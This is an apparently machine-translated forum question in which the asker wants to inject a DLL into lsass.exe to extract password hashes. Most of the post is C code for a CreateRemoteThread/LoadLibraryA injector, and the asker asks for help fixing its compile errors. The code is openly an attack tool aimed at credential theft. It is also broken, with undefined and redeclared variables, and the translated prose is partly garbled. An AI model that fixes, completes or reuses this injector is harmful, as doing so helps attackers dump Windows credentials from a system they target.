0
嘿,我试图注入一个DLL进入一个进程,即lsass.exe获取哈希。它有点hacky,但不能帮助我的项目。 我有dll注入的代码,但在Visual C++它给错误,如..使用C的dll注入
在TEXT( “LoadLibraryA”))))---- >>>参数常量WCHAR不相容与LPCSTR
在lpFuncAddr ----------- >>>参数类型 “LPVOID” 与参数类型 “LPTHREAD_START日常” 不相容
CODE:
BOOL InjectDLL(DWORD dwProcessId, LPCSTR lpszDLLPath)
{
HANDLE hProcess, hThread;
LPVOID lpBaseAddr, lpFuncAddr;
DWORD dwMemSize, dwExitCode;
BOOL bSuccess = FALSE;
HMODULE hUserDLL;
//convert char to wchar
char *lpszDLLPath = "hash.dll";
size_t origsize = strlen(orig) + 1;
const size_t newsize = 100;
size_t convertedChars = 0;
wchar_t dllpath[newsize];
mbstowcs_s(&convertedChars, dllpath, origsize, orig, _TRUNCATE);
if((hProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION
|PROCESS_VM_WRITE|PROCESS_VM_READ, FALSE, dwProcessId)))
{
dwMemSize = wcslen(dllpath) + 1;
if((lpBaseAddr = VirtualAllocEx(hProcess, NULL, dwMemSize, MEM_COMMIT, PAGE_READWRITE)))
{
if(WriteProcessMemory(hProcess, lpBaseAddr, lpszDLLPath, dwMemSize, NULL))
{
if((hUserDLL = LoadLibrary(TEXT("kernel32.dll"))))
{
if((lpFuncAddr = GetProcAddress(hUserDLL, TEXT("LoadLibraryA"))))
{
if((hThread = CreateRemoteThread(hProcess, NULL, 0, lpFuncAddr, lpBaseAddr, 0, NULL)))
{
WaitForSingleObject(hThread, INFINITE);
if(GetExitCodeThread(hThread, &dwExitCode)) {
bSuccess = (dwExitCode != 0) ? TRUE : FALSE;
}
CloseHandle(hThread);
}
}
FreeLibrary(hUserDLL);
}
}
VirtualFreeEx(hProcess, lpBaseAddr, 0, MEM_RELEASE);
}
CloseHandle(hProcess);
}
return bSuccess;
}
int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow)
{
if(InjectDLL(PROCESSID, "hash.dll")) {
MessageBox(NULL, TEXT("DLL Injected!"), TEXT("DLL Injector"), MB_OK);
}else {
MessageBox(NULL, TEXT("Couldn't inject DLL"), TEXT("DLL Injector"), MB_OK | MB_ICONERROR);
}
return 0;
}
伊马初学者到DLL和windows编程等等会感谢您的帮助。
thnx我试试看 – AJINKYA 2011-01-10 17:49:10